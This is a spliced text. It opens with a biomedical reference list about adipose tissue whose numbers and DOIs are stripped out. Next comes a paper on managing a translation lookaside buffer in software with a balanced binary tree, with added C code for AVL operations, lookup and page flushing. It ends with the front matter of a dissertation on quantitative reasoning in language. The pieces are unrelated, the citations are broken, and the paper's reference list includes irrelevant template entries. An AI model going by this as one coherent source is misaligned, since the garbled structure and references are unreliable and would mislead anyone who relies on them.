jorgez c, matzuk mm & brown cw. deficiency of growth differentiation factor protects against diet- induced obesity by selectively acting on white adipose. molecular endocrinology – . (https://doi.org/ . /me. - ) modica s & wolfrum c. the dual role of bmp in adipogenesis and metabolism. 
adipocyte – . (https://doi.org/ . / . . ) emmerson pj, wang f, du y, liu q, pickard rt, gonciarz md, coskun t, hamang mj, sindelar dk, ballman kk, et al. the metabolic effects of gdf are mediated by the orphan receptor gfral. nature medicine – . (https://doi.org/ . /nm. ) kelly b & o’neill la. metabolic reprogramming in macrophages and dendritic cells in innate immunity. cell research – . (https://doi.org/ . /cr. . ) sugimoto m, sakagami h, yokote y, onuma h, kaneko m, mori m, sakaguchi y, soga t & tomita m. non-targeted metabolite profiling in activated macrophage secretion. metabolomics – . (https://doi.org/ . /s - - - ) carrière a, jeanson y, berger-müller s, andré m, chenouard v, arnaud e, barreau c, walther r, galinier a, wdziekonski b, et al. browning of white adipose cells by intermediate metabolites: an adaptive mechanism to alleviate redox pressure. diabetes – . (https://doi.org/ . /db - ) hanatani s, motoshima h, takaki y, kawasaki s, igata m, matsumura t, kondo t, senokuchi t, ishii n, kawashima j, et al. acetate alters expression of genes involved in beige adipogenesis in t -l cells and obese kk-ay mice. journal of clinical biochemistry and nutrition – . (https://doi. org/ . /jcbn. - ) sahuri-arisoylu m, brody lp, parkinson jr, parkes h, navaratnam n, miller ad, thomas el, frost g & bell jd. reprogramming of hepatic fat accumulation and ‘browning’ of adipose tissue by the short-chain fatty acid acetate. international journal of obesity – . (https://doi.org/ . /ijo. . ) dalli j & serhan cn. specific lipid mediator signatures of human phagocytes: microparticles stimulate macrophage efferocytosis and pro-resolving mediators. blood e –e . (https://doi. org/ . /blood- - - ) masoodi m, kuda o, rossmeisl m, flachs p & kopecky j. lipid signaling in adipose tissue: connecting inflammation and metabolism. biochimica et biophysica acta – . (https://doi.org/ . /j.bbalip. . . ) endo y, blinova k, romantseva t, golding h & zaitseva m. differences in pge production between primary human monocytes and differentiated macrophages: role of il- β and trif/irf . plos one e . (https://doi.org/ . /journal.pone. ) garcía-alonso v, titos e, alcaraz-quiles j, rius b, lopategi a, lópez- vicario c, jakobsson pj, delgado s, lozano j & clària j. prostaglandin e exerts multiple regulatory actions on human obese adipose tissue remodeling, inflammation, adaptive thermogenesis and lipolysis. plos one e . (https://doi.org/ . /journal. pone. ) suárez j, rivera p, arrabal s, crespillo a, serrano a, baixeras e, pavón fj, cifuentes m, nogueiras r, ballesteros j, et al. oleoylethanolamide enhances β-adrenergic-mediated thermogenesis and white-to-brown adipocyte phenotype in epididymal white adipose tissue in rat. disease models and mechanisms – . (https://doi.org/ . /dmm. ) caër c, rouault c, roy tl, poitou c, aron-wisnewsky j, torcivia a, bichet jc, clément k, guerre-millo m & andré s. immune cell- derived cytokines contribute to obesity-related inflammation, fibrogenesis and metabolic deregulation in human adipose tissue. scientific reports . (https://doi.org/ . /s - - -w) wang b, fu x, liang x, deavila jm, wang z, zhao l, tian q, zhao j, gomez na, trombetta sc, et al. retinoic acid induces white adipose tissue browning by increasing adipose vascularity and inducing beige adipogenesis of pdgfrα+ adipose progenitors. cell discovery . (https://doi.org/ . /celldisc. . ) darwich l, coma g, peña r, bellido r, blanco ejj, este ja, borras fe, clotet b, ruiz l, rosell a, et al. 
International Journal of Advanced Network, Monitoring and Controls
Software TLB Management Method Based on Balanced Binary Tree

Chen Hongyu, Zhang Yuke, Zhao Li, Ai Jian
School of Computer Science and Engineering, Xi'an Technological University, Xi'an, China

Abstract. Purpose: As computer systems develop, there is growing pressure to reduce the number of translation lookaside buffer (TLB) misses and to limit their cost. The usual solution handles a TLB miss in software or hardware by finding the page table and then performing an index operation to locate the wanted page. Method: To meet the speed requirements of a software management method for mapping virtual addresses to physical addresses, and to allow the TLB to grow, we design a software management method based on a balanced binary search tree. Page management is implemented entirely in software: the TLB is managed by the operating system against an abstract model, the memory management unit (MMU) is no longer relied on for this task, and a balanced binary tree is built to search the TLB. Result: In the balanced state, a binary search tree has the advantage of pruning in interval-search problems, so searching the TLB this way is conducive to expanding TLB capacity, makes space on chip for the cache and other performance-improvement designs, and reduces cost. The trade-off is a slower lookup: some time is sacrificed to free up CPU design space. Conclusion: The method frees CPU design space, allows a larger TLB at lower cost, and its optimization algorithm is worthy of further research.

Keywords: TLB; balanced binary tree; software management

I. Introduction
With the continuous development of the computer, CPU speed has kept increasing while memory speed has not improved at the same pace. Improving the TLB helps the computer handle large virtual address spaces. In this paper we design a software TLB management method that constructs a balanced binary search tree keyed on the virtual page number. Even when the TLB managed by the balanced search tree is large, the method handles lookups quickly: for example, doubling the number of virtual page numbers in the balanced state increases the average number of retrievals by only one. Retrieval is therefore fast, capacity can increase, and the hit rate rises with it. Moreover, the time cost of building the tree is spread evenly over the searches, so the average search time decreases. The balanced binary search tree's ability to prune the search interval lets us find a virtual page number quickly and locate the corresponding position in memory. Because page numbers must be searched many times, this helps in dealing with large virtual address spaces.

II. TLB
Most programs access a small set of pages many times, so the TLB records these frequently used pages and their information, which accelerates the mapping from virtual addresses to physical addresses.
The basic unit of TLB storage is the page-table entry, which corresponds to a page-table entry stored in RAM. The larger the TLB capacity, the more page-table entries can be stored and the higher the probability of a TLB hit. Because TLB capacity is limited, the RAM page table and the TLB entries cannot be in one-to-one correspondence.

A. Location
The TLB caches a subset of page-table entries. It can sit between the CPU and the CPU cache, or between the CPU cache and main memory, depending on whether the cache uses physical or virtual addressing. If the cache is virtually addressed, the addressing request is sent directly from the CPU to the cache, and the required TLB entries are accessed from the cache. If the cache uses physical addressing, the CPU first performs address translation for each memory operation and sends the resulting physical address to the cache. Each arrangement has its own advantages and disadvantages.

B. Common optimization
A common optimization for physically addressed caches is to perform the TLB search and the cache access in parallel. The low-order bits of a virtual address represent the offset of the requested address within its page, and these bits do not change during the transition from virtual to physical address. Accessing the CPU cache consists of two steps: use an index to find the corresponding entries in the cache data store, then compare the tags of the entries found. If the cache is indexed only by bits that stay within the page offset during translation, then the TLB's translation of the high-order bits (the virtual page number) and the cache's "index" operation can be performed in parallel. The page number of the physical address obtained from the TLB is then sent to the CPU cache, which compares page-number tags to determine whether the access is a hit or a miss. It is also possible to perform the TLB search and cache access in parallel even when the cache must use some bits that may change during address translation; refer to the address-translation discussion of cache entries for further details on caches and TLBs under virtual addressing.

III. Algorithm of the Balanced Binary Search Tree
A balanced binary tree has the following property: it is either an empty tree, or a tree in which the absolute height difference between its left and right subtrees is no more than one and both subtrees are themselves balanced binary trees.

A. Insert operation
Inserting a new node into a balanced binary tree can destroy its balance. First we need to find the pointer to the root of the minimal subtree that is out of balance after the insertion, then adjust the links among the nodes of that subtree so that it becomes a balanced subtree again. Once the minimal unbalanced subtree has been adjusted, no other unbalanced subtree needs adjustment.

LL-type adjustment: a node is inserted into the left subtree of node B, the left child of node A. After the insertion, the balance factor of B becomes +1 and that of A becomes +2, so the subtree rooted at A is the minimal unbalanced subtree. To adjust, B is rotated to the right to replace A as the root of the previously unbalanced subtree; A rotates down and to the right to become the root of B's right subtree, and B's original right subtree becomes A's left subtree. A minimal C sketch of this rotation and insertion logic is given below.
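The paper gives no implementation, so the following is a minimal sketch in C of a node layout, the rotations, and the insertion just described. The field and function names, and the choice of keying on the virtual page number with a frame number as payload, are illustrative assumptions rather than part of the original text.

```c
#include <stdlib.h>

/* Illustrative AVL node keyed by virtual page number (VPN). */
typedef struct avl_node {
    unsigned long vpn;                 /* key: virtual page number            */
    unsigned long pfn;                 /* payload: physical page frame number */
    int height;                        /* height of the subtree rooted here   */
    struct avl_node *left, *right;
} avl_node;

static int height_of(const avl_node *n) { return n ? n->height : 0; }
static int max_int(int a, int b)        { return a > b ? a : b; }
static int balance_factor(const avl_node *n) {
    return n ? height_of(n->left) - height_of(n->right) : 0;
}

/* Right rotation: used for the LL case described above. */
static avl_node *rotate_right(avl_node *a) {
    avl_node *b = a->left;             /* B is A's left child                        */
    a->left = b->right;                /* B's right subtree becomes A's left subtree */
    b->right = a;                      /* A rotates down to be B's right child       */
    a->height = 1 + max_int(height_of(a->left), height_of(a->right));
    b->height = 1 + max_int(height_of(b->left), height_of(b->right));
    return b;                          /* B is the new root of this subtree          */
}

/* Mirror image, for the RR case. */
static avl_node *rotate_left(avl_node *a) {
    avl_node *b = a->right;
    a->right = b->left;
    b->left = a;
    a->height = 1 + max_int(height_of(a->left), height_of(a->right));
    b->height = 1 + max_int(height_of(b->left), height_of(b->right));
    return b;
}

/* Insert a (vpn, pfn) pair and rebalance on the way back up. */
static avl_node *avl_insert(avl_node *root, unsigned long vpn, unsigned long pfn) {
    if (!root) {
        avl_node *n = calloc(1, sizeof *n);
        n->vpn = vpn;
        n->pfn = pfn;
        n->height = 1;
        return n;
    }
    if (vpn < root->vpn)
        root->left = avl_insert(root->left, vpn, pfn);
    else if (vpn > root->vpn)
        root->right = avl_insert(root->right, vpn, pfn);
    else {                             /* duplicate VPN: just refresh the mapping */
        root->pfn = pfn;
        return root;
    }

    root->height = 1 + max_int(height_of(root->left), height_of(root->right));
    int bf = balance_factor(root);

    if (bf > 1 && vpn < root->left->vpn)   return rotate_right(root);                        /* LL */
    if (bf < -1 && vpn > root->right->vpn) return rotate_left(root);                         /* RR */
    if (bf > 1)  { root->left  = rotate_left(root->left);   return rotate_right(root); }     /* LR */
    if (bf < -1) { root->right = rotate_right(root->right); return rotate_left(root);  }     /* RL */
    return root;
}
```

The LR and RL cases use a double rotation, mirroring the single-rotation LL and RR cases.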
In binary search trees, the advantage of keeping the tree balanced is a better-shaped structure and therefore faster searches; the disadvantage is that insertion and deletion become more complicated, which slows those operations. Rebalancing after a deletion is more involved than after an insertion; it is outlined next.

B. AVL deletion
Like the insert operation, deleting a node may break the balance, which requires us to rebalance the tree after the deletion. Deletion is divided into the following situations:
- First, search the whole binary tree for the node to be deleted. If it is not found, return without changes; otherwise perform the following operations, with T denoting the current root node.
- If the left and right subtrees are both non-empty, the deletion is carried out in the taller subtree:
  - If the height of the left subtree is greater than that of the right subtree, assign the largest element of the left subtree to the current root node, then delete the node holding that largest value from the left subtree.
  - If the height of the left subtree is less than that of the right subtree, assign the smallest element of the right subtree to the current root node, then delete the node holding that smallest value from the right subtree.
- If one of the left and right subtrees is empty, replace the current root node with the non-empty subtree, or with null if both are empty.
- If the value of the node to be deleted is less than the value of the current root node T, delete it recursively in the left subtree; if it is greater, delete it recursively in the right subtree.
- After the recursive deletion, determine whether the current root node still meets the balance condition. If it does, only the height information of T needs to be updated; otherwise a rotation adjustment is required. If the height of the left subtree of T's left child is greater than the height of the right subtree of T's left child, the corresponding single rotation is performed; otherwise a double rotation is performed.
A sketch of deletion with rebalancing, continuing the code above, is given at the end of this section.

C. Summary
- Non-leaf nodes have at most two child nodes.
- The value of a non-leaf node is larger than that of its left child and smaller than that of its right child.
- The difference in height between the left and right sides of the tree is no more than one.
- There are no nodes with identical values.
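Continuing the sketch from Section III-A (same assumed avl_node layout and helper functions), deletion with rebalancing could look roughly as follows. Note that, for the two-children case, this sketch always takes the in-order successor from the right subtree, whereas the text above picks the replacement from the taller subtree; both variants preserve the AVL property.

```c
/* Find the leftmost (smallest-key) node in a subtree. */
static avl_node *min_node(avl_node *n) {
    while (n->left) n = n->left;
    return n;
}

/* Delete the entry for `vpn`, rebalancing on the way back up. */
static avl_node *avl_delete(avl_node *root, unsigned long vpn) {
    if (!root) return NULL;                       /* key not found: nothing to do */

    if (vpn < root->vpn) {
        root->left = avl_delete(root->left, vpn);
    } else if (vpn > root->vpn) {
        root->right = avl_delete(root->right, vpn);
    } else if (!root->left || !root->right) {
        /* Zero or one child: splice the node out and return the child (or NULL). */
        avl_node *child = root->left ? root->left : root->right;
        free(root);
        return child;
    } else {
        /* Two children: copy the in-order successor up, then delete it below. */
        avl_node *succ = min_node(root->right);
        root->vpn = succ->vpn;
        root->pfn = succ->pfn;
        root->right = avl_delete(root->right, succ->vpn);
    }

    root->height = 1 + max_int(height_of(root->left), height_of(root->right));
    int bf = balance_factor(root);

    /* Single rotation when the taller child leans the same way, double otherwise. */
    if (bf > 1 && balance_factor(root->left) >= 0)  return rotate_right(root);
    if (bf > 1)  { root->left  = rotate_left(root->left);   return rotate_right(root); }
    if (bf < -1 && balance_factor(root->right) <= 0) return rotate_left(root);
    if (bf < -1) { root->right = rotate_right(root->right); return rotate_left(root);  }
    return root;
}
```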
IV. Design Scheme
Over time, the pattern of page-number requests can be regarded approximately as a collection of fully or partially ordered intervals. When the CPU issues a page-number request, the operating system first searches the balanced binary search tree of page numbers kept in the TLB, comparing the requested page number with the root node. If the root's page number is greater than the requested page number, the search continues recursively in the left subtree; if it is smaller, the search continues recursively in the right subtree. If the root's page number is exactly equal to the requested page number, the query is considered successful: the corresponding physical frame is read out and an adder splices in the in-page offset to convert it into the corresponding physical address.

A. Recursion exit
The recursion therefore terminates in one of two ways:
- the access succeeds and the corresponding physical address is obtained; or
- the left or right subtree of the current node is empty, so the access fails and the TLB holds no matching page number.
On a failure, the operating system retrieves the page table in memory, calls the corresponding page-table entry into the TLB, and inserts it into the TLB's balanced binary search tree according to its page number. When the balanced tree built over the TLB is full, the oldest page-table entries must be replaced; deleting an entry requires setting the flag bits appropriate to the replacement algorithm in use. Deletion can also cause imbalance, so the binary search tree must be rebalanced after the deletion.

Figure: Node model (left-subtree index, virtual page number, right-subtree index).
Figure: Search steps (flowchart of the lookup: compare the requested virtual page number with the current node; on a match, add the frame number and in-page offset and access storage; otherwise recurse into the left or right subtree, reporting a TLB miss when the subtree is empty).

V. TLB Storage
A typical page-table entry includes the page frame number, a protection bit, a modification (dirty) bit, an accessed bit, a cache-disable bit, and a present (on/off) bit. Each TLB entry in this design holds the virtual page number, a valid bit, a modification bit, protection bits, the page frame number, the index bits of the roots of its left and right subtrees, a balance factor, and so on.

Figure: TLB entry fields (valid | protect | modified | virtual page number | left-subtree index | right-subtree index | balance | page frame number).

A. Composition
The virtual page number marks the page that the entry maps; the valid bit records whether the entry is in use; the modification bit records whether the page has been written; the protection bits record read/write/execute permissions. The index bits of the left and right subtree roots and the balance factor are set by comparing page numbers against the current node, and they determine whether a lookup recurses into the left or the right subtree. Each node stores the indices of its left and right children and its balance factor; the balance factor can only be -1, 0, or +1, and if its absolute value exceeds 1 the balanced binary search tree is judged unbalanced. When the TLB is full, some page-table entries need to be eliminated; according to the corresponding page replacement algorithm, flag bits are flexibly set to mark the entries that should be evicted. Each TLB row also carries a valid bit: when the system starts, every row is empty and its contents are invalid, so the valid bit shows whether the information in the row is usable, and clearing a row's valid bit eliminates the corresponding page-table entry. A sketch of this entry layout and the recursive lookup is given below.
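A minimal C sketch combining the entry layout of Section V with the recursive lookup of Section IV. The field widths, names, and the 4 KB page size are assumptions made for illustration only, not values given in the paper.

```c
#include <stdint.h>
#include <stdbool.h>

#define PAGE_SHIFT        12    /* assumed 4 KB pages, for illustration only */
#define TLB_INVALID_INDEX (-1)

/* One software TLB entry, following the fields listed in Section V. */
typedef struct {
    bool     valid;             /* entry in use?                        */
    bool     modified;          /* dirty bit                            */
    uint8_t  protect;           /* read/write/execute permission bits   */
    uint64_t vpn;               /* virtual page number (the search key) */
    uint64_t pfn;               /* physical page frame number           */
    int      left, right;       /* indices of child entries, -1 if none */
    int8_t   balance;           /* balance factor: -1, 0, or +1         */
} sw_tlb_entry;

/* Recursive lookup over the index-linked balanced tree.
   Returns true and fills *paddr on a hit; false signals a TLB miss. */
bool sw_tlb_lookup(const sw_tlb_entry tlb[], int node,
                   uint64_t vaddr, uint64_t *paddr) {
    if (node == TLB_INVALID_INDEX)
        return false;                              /* empty subtree: TLB miss */

    uint64_t vpn    = vaddr >> PAGE_SHIFT;
    uint64_t offset = vaddr & ((1ULL << PAGE_SHIFT) - 1);
    const sw_tlb_entry *e = &tlb[node];

    if (vpn < e->vpn)                              /* search the left subtree  */
        return sw_tlb_lookup(tlb, e->left, vaddr, paddr);
    if (vpn > e->vpn)                              /* search the right subtree */
        return sw_tlb_lookup(tlb, e->right, vaddr, paddr);

    /* Hit: splice the page frame number with the in-page offset. */
    *paddr = (e->pfn << PAGE_SHIFT) | offset;
    return true;
}
```

On a miss (a false return value), the caller would walk the page table and insert the translation with the AVL-insert logic sketched earlier.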
Note: setting the global bit in a page-directory or page-table entry prevents that entry from being flushed; this is useful for pinning interrupt handlers in place.

B. Alternate method
An alternate method is the INVLPG instruction, which should be used instead of a full flush when making small modifications to the mappings (creating, removing, or changing a single mapping). It is mostly used in unmapping and remapping routines to invalidate a previously cached translation. If INVLPG, or some other TLB-flush method, is not used, the stale mapping remains cached, producing undefined consequences. Note, however, that INVLPG was introduced with the i486 ISA and is not part of the i386 ISA, so a properly written i386-compatible kernel must include the relevant code conditionally at compile time depending on the target machine. A minimal sketch of a single-page flush is given at the end of this subsection.

The situation is more complicated on multiprocessors. If another processor could also be affected by a page-table write (because of shared memory, or multiple threads from the same process), the TLB must be flushed on those processors as well, which requires some form of inter-processor communication.
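The paper does not show the flush itself; on x86 it is conventionally a one-line inline-assembly wrapper like the following. This is an assumption for illustration: it targets GCC-style inline assembly on i486-or-later x86 CPUs, and non-x86 or pre-i486 targets need a different mechanism (such as reloading CR3).

```c
/* Invalidate the cached translation for a single virtual address (x86, i486+). */
static inline void flush_one_page(void *vaddr) {
    __asm__ volatile("invlpg (%0)" : : "r"(vaddr) : "memory");
}
```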
VI. Mathematical Verification
Time complexity: in a balanced binary tree, the heights of the left and right subtrees differ by at most one. Let N_h be the minimum number of nodes in a balanced binary tree of depth h. Counting the root node, the recurrence is

    N_h = N_(h-1) + N_(h-2) + 1,

from which the minimum search length can be deduced by the characteristic-equation method. The characteristic equation is x^2 = x + 1, with roots x = (1 + sqrt(5))/2 and x = (1 - sqrt(5))/2. Trying the constant particular solution N = c and substituting it into the recurrence gives c = -1, so the general term is

    N_h = c1 * ((1 + sqrt(5))/2)^h + c2 * ((1 - sqrt(5))/2)^h - 1.

The second term vanishes as h grows, so N_h grows like ((1 + sqrt(5))/2)^h, and for a tree with n nodes the height satisfies

    h < log_((1+sqrt(5))/2)(n + 1) + O(1), approximately 1.44 * log2(n).

According to the characteristics of the tree, the maximum depth of a balanced binary tree with n nodes is therefore on the order of log2(n) (about 1.44 * log2(n) in the worst case), and the average search length is approximately log2(n).

VII. Modern Operating System
In a modern processor, software uses virtual addresses to access memory, and the processor's MMU is responsible for converting virtual addresses to physical addresses. To complete this mapping, software and hardware jointly maintain a multi-level page table. When the processor finds that a virtual address cannot be mapped to a physical address through the page table, it triggers a page-fault exception and suspends the faulting process; the operating system software must then handle the fault.

A. Content
The TLB is specifically used to cache page-table entries held in memory and usually sits inside the MMU. It is a very small cache with relatively few entries; each entry contains information about one page, such as a valid bit, the virtual page number, a modified bit, and the physical page frame number. When the processor wants to access a virtual address, it first queries the TLB:
- If there is no corresponding entry, a TLB miss occurs, and the page table must be accessed to compute the corresponding physical address.
- If there is a corresponding entry, the physical address is obtained directly from it; this is a TLB hit.
The basic unit of TLB storage is the TLB entry: the larger the TLB capacity, the more entries can be stored and the higher the hit rate, but the capacity is limited. The Linux kernel uses small (KB-sized) pages by default; a program whose working set spans many small pages needs a correspondingly large number of TLB entries to avoid misses, whereas a single huge page (MB-sized) covers the same range with one entry, and for applications that consume gigabytes of memory, GB-sized pages can be used to reduce TLB misses further.
Accessing the page table in memory is relatively time-consuming, especially now that multi-level page tables requiring multiple memory accesses are widely used. To speed up access, system designers added the TLB as a hardware cache for the page table. The CPU looks in the TLB first because lookups there are very fast: the TLB contains a small number of entries and is integrated into the CPU, so it runs at nearly CPU speed. If an entry containing the virtual address is found in the TLB (a TLB hit), the corresponding physical address is obtained directly from it. Otherwise a TLB miss occurs, and the page table of the current process must be searched (paging-structure caches may be used here). At this point another part of the MMU, the table-walk unit, is called out; walking the page table with this hardware unit is called hardware TLB miss handling and is usually adopted by CISC-architecture processors (such as x86). If the translation cannot be found in the page table either, a page fault appears and is handled by software (the operating system). In contrast, software TLB miss handling, usually adopted by RISC-architecture processors (such as Alpha), does not rely on a hardware walker after the miss: the operating system searches the page table in software. The hardware approach is faster, while the software approach is more flexible; IA-64 provides a hybrid mode that combines the advantages of both. A sketch of a software-handled miss is given below.
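A rough sketch of a software-handled miss over an assumed two-level page table. The table layout, index split, and helper names are illustrative assumptions that tie back to the software TLB sketched earlier; they are not the API of any particular kernel.

```c
#include <stdint.h>
#include <stdbool.h>

#define PAGE_SHIFT    12                  /* assumed 4 KB pages             */
#define PT_INDEX_BITS 10                  /* assumed two-level index split  */
#define PTE_PRESENT   0x1u

typedef uint32_t pte_t;

/* Top-level directory: each slot points to a page table, or is NULL. */
static pte_t *page_directory[1u << PT_INDEX_BITS];

/* Stubs standing in for the software TLB refill and the OS fault handler. */
static void sw_tlb_refill(uint64_t vpn, uint64_t pfn) { (void)vpn; (void)pfn; }
static void raise_page_fault(uint64_t vaddr)          { (void)vaddr; }

/* Software TLB miss handler: walk the page table and refill the TLB,
   or hand the fault to the operating system if the page is not present. */
void handle_tlb_miss(uint64_t vaddr) {
    uint64_t vpn      = vaddr >> PAGE_SHIFT;
    uint32_t pd_index = (uint32_t)(vpn >> PT_INDEX_BITS) & ((1u << PT_INDEX_BITS) - 1);
    uint32_t pt_index = (uint32_t) vpn                   & ((1u << PT_INDEX_BITS) - 1);

    pte_t *page_table = page_directory[pd_index];
    if (!page_table) {                    /* no page table maps this region */
        raise_page_fault(vaddr);
        return;
    }

    pte_t pte = page_table[pt_index];
    if (!(pte & PTE_PRESENT)) {           /* page not resident in memory    */
        raise_page_fault(vaddr);
        return;
    }

    sw_tlb_refill(vpn, pte >> PAGE_SHIFT); /* cache the translation          */
}
```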
If the present (P) bit of the page-table entry corresponding to the virtual address is set, the physical page corresponding to that address currently resides in memory: a page-table hit. Two things remain to be done. Since the translation could not be found in the TLB, the TLB is naturally updated; and the permissions are checked, including read/write/execute permissions and user/supervisor-mode permissions. Without the correct permissions, SIGSEGV (a segmentation fault) is triggered. If the P bit of the entry is clear, a page fault is triggered, and there may be several situations.

B. Address
- The virtual address has been allocated but never accessed (for example, when no physical memory is reserved at allocation time, it is only assigned on first use). After the page fault is triggered, physical memory is allocated; this is demand paging. Once the demand has been satisfied, the system sets the P bit.
- The contents of the corresponding physical page have been swapped out to external disk or flash. The page-table entry then stores the page's temporary location in the external swap area; the page can be swapped back into physical memory, the mapping re-established, and the P bit set again.
- The virtual address does not exist in the process's page table at all, meaning it lies outside the process's address space; in this case a segmentation fault is also triggered.

The CPU's MMU locates the page directory for the process using a dedicated register. The page-directory index (taken from the upper bits of the virtual address) is used to locate the PDE that identifies the page table needed to map the virtual address to a physical one; the page-table index (taken from the next group of bits) is used to locate the PTE that maps the physical location of the virtual memory page referenced by the address; and the PTE is used to locate the physical page. If the virtual page is mapped to a page that is already in physical memory, the PTE contains the page frame number (PFN) of the page holding the data in question (processors reference memory locations by PFN).

Figure: Translation process.

C. Steps on a TLB hit
- The CPU generates a virtual address.
- It is checked in the TLB and found to be present.
- The corresponding frame number is retrieved, which tells where in main memory the page lies.

D. Steps on a TLB miss
- The CPU generates a virtual address.
- It is checked in the TLB and is not present.
- The page number is matched against the page table residing in main memory (assuming the page table contains all PTEs).
- The corresponding frame number is retrieved, which tells where in main memory the page lies.
- The TLB is updated with the new PTE (if there is no free slot, a replacement technique such as FIFO, LRU, or MFU chooses a victim).

E. Conclusion
Effective memory access time (EMAT): the TLB reduces the effective memory access time because it is a high-speed associative cache:

    EMAT = h * (c + m) + (1 - h) * (c + 2m),

where h is the TLB hit ratio, m is the memory access time, and c is the TLB access time. A small numeric check of this formula is given at the end of this section. If the page is not in physical memory, the MMU raises a page fault and (on Windows) the page-fault-handling code attempts to locate the page in the system paging file. If the page can be located, it is loaded into physical memory and the PTE is updated to reflect its location. If it cannot be located and the translation is a user-mode translation, an access violation occurs, because the virtual address references an invalid physical address. If it cannot be located and the translation is occurring in kernel mode, a bug check (also called a blue screen) occurs.

Figure: Mapping relation.
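As a quick numeric check of the EMAT formula above (the hit ratio and access times are made-up illustrative values, not measurements from the paper):

```c
#include <stdio.h>

/* EMAT = h*(c + m) + (1 - h)*(c + 2*m)
   h: TLB hit ratio, c: TLB access time, m: memory access time. */
static double emat(double h, double c, double m) {
    return h * (c + m) + (1.0 - h) * (c + 2.0 * m);
}

int main(void) {
    double h = 0.98;     /* assumed hit ratio                 */
    double c = 1.0;      /* assumed TLB access time, in ns    */
    double m = 100.0;    /* assumed memory access time, in ns */

    /* 0.98 * 101 + 0.02 * 201 = 98.98 + 4.02 = 103.00 ns */
    printf("EMAT = %.2f ns\n", emat(h, c, m));
    return 0;
}
```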
VIII. Conclusion
According to the characteristics of the tree, the maximum depth of a balanced binary tree with n nodes is about 1.44 * log2(n) and the average search length is approximately log2(n). In this paper we have discussed a software TLB management method based on a balanced binary search tree, using an abstract model. The method takes advantage of the balanced binary search tree's strength in pruning and searching, so it can quickly complete the retrieval of a virtual page number and its physical page. As the TLB expands, the number of TLB misses decreases, and the cost of building the tree is shared evenly across the searches. To a certain extent this improves the performance of the operating system when processing a large virtual memory space, accelerates the conversion from virtual addresses to physical addresses, and makes room for other on-chip designs. However, for lack of an experimental environment and sufficient theoretical groundwork, we have only verified the theoretical time complexity mathematically and statistically; we have not tested the scheme in a real environment, and in particular we have not verified the reliability of the program model based on the balanced binary search tree under hardware instability or storage corruption, such as loss of power and other special circumstances. A software model that can be relied on in engineering must consider all such special circumstances: stability and reliability are the most important aspects of a software model. The balanced binary search tree used as the search scheme in this model also leaves room for further optimization. Algorithms designed in future research should consider not only running speed but also the difficulty of implementation in practical engineering and of future maintenance; the complexity of maintenance work and the stability of the software model deserve further study. Engineering and theory form a unity of opposites: theory is the source of engineering, and the development of theory needs the support of engineering.

References
[1] Marin G, Mellor-Crummey J. Cross-architecture performance predictions for scientific applications using parameterized models. Measurement and Modeling of Computer Systems.
[2] Boncz P, Manegold S, Kersten M L, et al. Database architecture optimized for the new bottleneck: memory access. Very Large Data Bases.
[3] G. M. Adelson-Velsky, E. M. Landis. An algorithm for the organization of information.
[4] Deb, Kalyanmoy, and Ram Bhushan Agrawal. Simulated binary crossover for continuous search space. Complex Systems.
[5] I. S. Jacobs and C. P. Bean. Fine particles, thin films and exchange anisotropy. In Magnetism, vol. III, G. T. Rado and H. Suhl, Eds. New York: Academic.
[6] M. Young. The Technical Writer's Handbook. Mill Valley, CA: University Science.
[7] Talluri M, Hill M D. Surpassing the TLB performance of superpages with less operating system support. Architectural Support for Programming Languages and Operating Systems.
[8] Sleator, Daniel D., and Robert E. Tarjan. Self-adjusting binary search trees. Journal of the ACM.
[9] Rajwar R, Herlihy M, Lai K K, et al. Virtualizing transactional memory. International Symposium on Computer Architecture.
[10] Menon A, Santos J R, Turner Y, et al. Diagnosing performance overheads in the Xen virtual machine environment. Virtual Execution Environments.

© by Subhro Roy. All rights reserved.
Reasoning about Quantities in Natural Language

by Subhro Roy

Dissertation submitted in partial fulfillment of the requirements for the degree of Doctor of Philosophy in Computer Science in the Graduate College of the University of Illinois at Urbana-Champaign, Urbana, Illinois.

Doctoral committee: Professor Dan Roth (Chair); Professor Gerald DeJong; Associate Professor Julia Hockenmaier; Associate Professor Luke Zettlemoyer (University of Washington).

Abstract

Quantitative reasoning involves understanding the use of quantities and numeric relations in text, and reasoning with respect to them. It forms an essential part of everyday interaction. However, little work from the natural language processing community has focused on quantitative reasoning. In this thesis, we investigate the challenges in performing automated quantitative reasoning over natural language text. We formulate several tasks to tackle some of the fundamental problems of quantitative reasoning, and address the problem of developing robust statistical methods for these tasks. We show that standard NLP tools are not sufficient to obtain the abstraction needed for quantitative reasoning; the standard NLP pipeline needs to be extended in various ways. We propose several technical ideas for these extensions. We first look at the problem of detecting and normalizing quantities expressed in free-form text, and show that correct detection and normalization can support several simple quantitative inferences. We then focus on numeric relation extraction from sentences, and show that several natural properties of language can be leveraged to effectively extract numeric relations from a sentence. We finally investigate the problem of quantitative reasoning over multiple quantities mentioned across several sentences. We develop a decomposition strategy which allows reasoning over pairs of numbers to be combined effectively to perform global reasoning. We also look at the problem of effectively using math domain knowledge in quantitative reasoning. On this front, we first propose graph representations called "unit dependency graphs", and show that these graph representations can be used to effectively incorporate dimensional analysis knowledge in quantitative reasoning. Next, we develop a general framework to incorporate any declarative knowledge into quantitative reasoning. This framework is used to incorporate several mathematical concepts into textual quantitative reasoning, leading to robust reasoning systems.

To my mom.

Acknowledgments

I consider myself fortunate to have Dan as my research advisor. He took me on as a PhD student when I was a confused theory deserter with no clue about NLP. He had the most encouraging words about my progress, even when I felt frustrated with the lack of results. He always encouraged me to strive for better results, and understand the bigger picture of the research. He has taught me to not only be a better researcher, but also to be a kind and compassionate human being. I would like to thank my committee members: Prof. Gerald DeJong, Prof. Julia Hockenmaier and Prof. Luke Zettlemoyer, from whom I got valuable feedback on my research. I would also like to thank all my internship mentors and collaborators, namely Ming-Wei Chang, Scott Yih, Hannaneh Hajishirzi, Rik Koncel-Kedziorski, Mark Hopkins, and JD Chen; I have learnt a lot working with them. Special thanks to my friends Shyam and John; I will miss our long afternoon walks discussing research among other things.
